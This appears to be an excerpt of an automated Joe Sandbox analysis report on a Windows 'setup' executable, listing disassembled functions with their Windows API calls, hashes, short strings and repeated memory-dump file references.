                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .FSM$AUTH$STPM$XTPM
                                                                                                    • API String ID: 0-3563634139
                                                                                                    • Opcode ID: 8950c3b489525491c3e4e5b7dcefee575f5288a1221e40b25e17281109483490
                                                                                                    • Instruction ID: 825842324b92974e3ed2f74c88809d8235cc9decc79b819b94596d280e3a74f8
                                                                                                    • Opcode Fuzzy Hash: 8950c3b489525491c3e4e5b7dcefee575f5288a1221e40b25e17281109483490
                                                                                                    • Instruction Fuzzy Hash: 2A113B72920233FBC730CEA4E4846BAB3D9AB04315710892DD8A6D7251D773DC69CBB2
                                                                                                    APIs
                                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 0032F9E3
                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0032FA0F
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 0032FA6A
                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 0032F9BD
                                                                                                      • Part of subcall function 003306E0: abort.MSVCRT(?,?,?,?,?,?,002801AF), ref: 00330710
                                                                                                      • Part of subcall function 003306E0: abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330718
                                                                                                      • Part of subcall function 003306E0: abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330720
                                                                                                      • Part of subcall function 003306E0: abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330728
                                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 0032FA85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Deleteabort$Leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2046026691-0
                                                                                                    • Opcode ID: 8387fc3e96c2276f3db2043a7668bb0b17c54c1d2380b5eba886791994a7b34b
                                                                                                    • Instruction ID: 8b40da466f1d2215478ba7c433fd6404d78f650ebc11a6438648fc473f2afab8
                                                                                                    • Opcode Fuzzy Hash: 8387fc3e96c2276f3db2043a7668bb0b17c54c1d2380b5eba886791994a7b34b
                                                                                                    • Instruction Fuzzy Hash: C021E5B55187159FC761AFB4D58859EBBF8BF84380F420D3DE48987602EB30A584CF92
                                                                                                    APIs
                                                                                                    • gmtime.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001EEBA0
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001EEBF2
                                                                                                    • CreateFileW.KERNEL32 ref: 001EEC32
                                                                                                    • SetFileTime.KERNEL32 ref: 001EEC54
                                                                                                    • CloseHandle.KERNEL32 ref: 001EEC60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileTime$CloseCreateHandleSystemgmtime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2587785350-0
                                                                                                    • Opcode ID: 3d061c4d25b6462712f973d6aa69a56a4bf9563ff0889290e46c7e9d96114b78
                                                                                                    • Instruction ID: 0a11dd8e72b293e71d2335e32d454f334f4afa7dcb9e1b7d79f296cbf416d33c
                                                                                                    • Opcode Fuzzy Hash: 3d061c4d25b6462712f973d6aa69a56a4bf9563ff0889290e46c7e9d96114b78
                                                                                                    • Instruction Fuzzy Hash: 4B21DFB05183009FC340EF64D68861BBBF0FF94714F559A2EE8898B365E3B9D549CB86
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$callocfree
                                                                                                    • String ID: Win32: Failed to convert string from UTF-8
                                                                                                    • API String ID: 1064854850-64859510
                                                                                                    • Opcode ID: 7af09457593a78c3e1321b6bea3b8271419c09103f7540ebe36d528f9689f864
                                                                                                    • Instruction ID: 5e8ccb0054e5e1720e8da5549ff1ba004fb383a6e54f3aca0d76e9667f14207d
                                                                                                    • Opcode Fuzzy Hash: 7af09457593a78c3e1321b6bea3b8271419c09103f7540ebe36d528f9689f864
                                                                                                    • Instruction Fuzzy Hash: 8C1128B05193069BC310BF69D90831BBAE0BB80B50F018A1DE8E84B281D7B98954DB93
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PathTempmallocreallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1347774481-0
                                                                                                    • Opcode ID: 41fcc3b8e96f7e168fbc4d439c60aac73f1970266f3d1ac8902ebbc9fc003ca9
                                                                                                    • Instruction ID: 73339e1613c371a83ab54d56da280a9c728e782df9f9780cc7f4085a3ae0e466
                                                                                                    • Opcode Fuzzy Hash: 41fcc3b8e96f7e168fbc4d439c60aac73f1970266f3d1ac8902ebbc9fc003ca9
                                                                                                    • Instruction Fuzzy Hash: DE017CB45097008FD760FF68E98534CBBF0BB04309F41483DE58893312EB7499589B66
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Client$CursorScreen$ClipDevicesInputRectRegister
                                                                                                    • String ID:
                                                                                                    • API String ID: 3910241791-0
                                                                                                    • Opcode ID: a44ab7959486de792cadd1e54affc13b8c0ac54c23a9c197e56ff31e29d992b9
                                                                                                    • Instruction ID: 7661993d25a9a8f5f063629323429fb23e12280775a32f401d56e5bedb62a070
                                                                                                    • Opcode Fuzzy Hash: a44ab7959486de792cadd1e54affc13b8c0ac54c23a9c197e56ff31e29d992b9
                                                                                                    • Instruction Fuzzy Hash: BC01DA719147008FD701BF78EA8915D7BF4AF49302F054939EC858B215E774D8588B93
                                                                                                    APIs
                                                                                                    • strcpy.MSVCRT ref: 0020AF97
                                                                                                    • malloc.MSVCRT ref: 0020AFA6
                                                                                                    • strncpy.MSVCRT ref: 0020AFBC
                                                                                                      • Part of subcall function 001EE7F0: malloc.MSVCRT ref: 001EE800
                                                                                                      • Part of subcall function 001EE7F0: CharToOemW.USER32 ref: 001EE822
                                                                                                      • Part of subcall function 001EE7F0: free.MSVCRT ref: 001EE82E
                                                                                                    • free.MSVCRT ref: 0020AFE4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemalloc$Charstrcpystrncpy
                                                                                                    • String ID: %s
                                                                                                    • API String ID: 3270163058-620797490
                                                                                                    • Opcode ID: 4792263de77d89e983a70aa74d2bc1d30385840b1dcf7f2807cc66852d501898
                                                                                                    • Instruction ID: 36f61abe3c5e368083b0606e6883ef342d7d5748ce697999ba9bd59f5f1e2692
                                                                                                    • Opcode Fuzzy Hash: 4792263de77d89e983a70aa74d2bc1d30385840b1dcf7f2807cc66852d501898
                                                                                                    • Instruction Fuzzy Hash: 1CF0B2B0819750ABC751FF69C58255EFBE0AF48704F82882EF8C997302D774D9909B92
                                                                                                    Strings
                                                                                                    • Invalid window aspect ratio %i:%i, xrefs: 00246508
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Invalid window aspect ratio %i:%i
                                                                                                    • API String ID: 0-325947436
                                                                                                    • Opcode ID: 6ead20802facccf9c038a9b70ad36bbea5b2a74ad82ca05572bca98a687888f3
                                                                                                    • Instruction ID: 4ce7ef54291f4e63bcfdb346126b4c0c959ede07dcbc7b627957e82234eb0f6b
                                                                                                    • Opcode Fuzzy Hash: 6ead20802facccf9c038a9b70ad36bbea5b2a74ad82ca05572bca98a687888f3
                                                                                                    • Instruction Fuzzy Hash: C46156B5918301CFCB14AF29C64831ABBF0BF89718F148A2EF99887265E775D954CB43
                                                                                                    APIs
                                                                                                    • GetProcessWorkingSetSize.KERNEL32 ref: 0020A7CA
                                                                                                    • GetStartupInfoW.KERNEL32 ref: 0020A845
                                                                                                    • QueryPerformanceCounter.KERNEL32 ref: 0020A882
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CounterInfoPerformanceProcessQuerySizeStartupWorking
                                                                                                    • String ID: D
                                                                                                    • API String ID: 2251184149-2746444292
                                                                                                    • Opcode ID: ef31e4104b61374f78a8ff5e37d509f9f3d0618bcdd2d8dbe3a21188b71461d8
                                                                                                    • Instruction ID: df3e0bbf6509d22ca6ea4bf40a821bf324361f0f1cb34d5aac2f95e42051f307
                                                                                                    • Opcode Fuzzy Hash: ef31e4104b61374f78a8ff5e37d509f9f3d0618bcdd2d8dbe3a21188b71461d8
                                                                                                    • Instruction Fuzzy Hash: 7351C2B57283428FDB114E29889032EBBE1AFDA354F58493DD8CAD3392D630D9458B17
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _errno
                                                                                                    • String ID: exp
                                                                                                    • API String ID: 2918714741-113136155
                                                                                                    • Opcode ID: b6a3e9b43918509c2acfc04b06b9b65e0585c758482a847c8df44ed1d2dac100
                                                                                                    • Instruction ID: a244aabe589908db75fe14874111dffd46b25120661961c78344fb003fc3e76a
                                                                                                    • Opcode Fuzzy Hash: b6a3e9b43918509c2acfc04b06b9b65e0585c758482a847c8df44ed1d2dac100
                                                                                                    • Instruction Fuzzy Hash: 7241C2F1D08746A6DB027F00E8093597FE0FB85744F514D89E4C8612B5FB368A788B86
                                                                                                    APIs
                                                                                                    • GetProcessWorkingSetSize.KERNEL32 ref: 0020A7CA
                                                                                                    • GetStartupInfoW.KERNEL32 ref: 0020A845
                                                                                                    • QueryPerformanceCounter.KERNEL32 ref: 0020A882
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
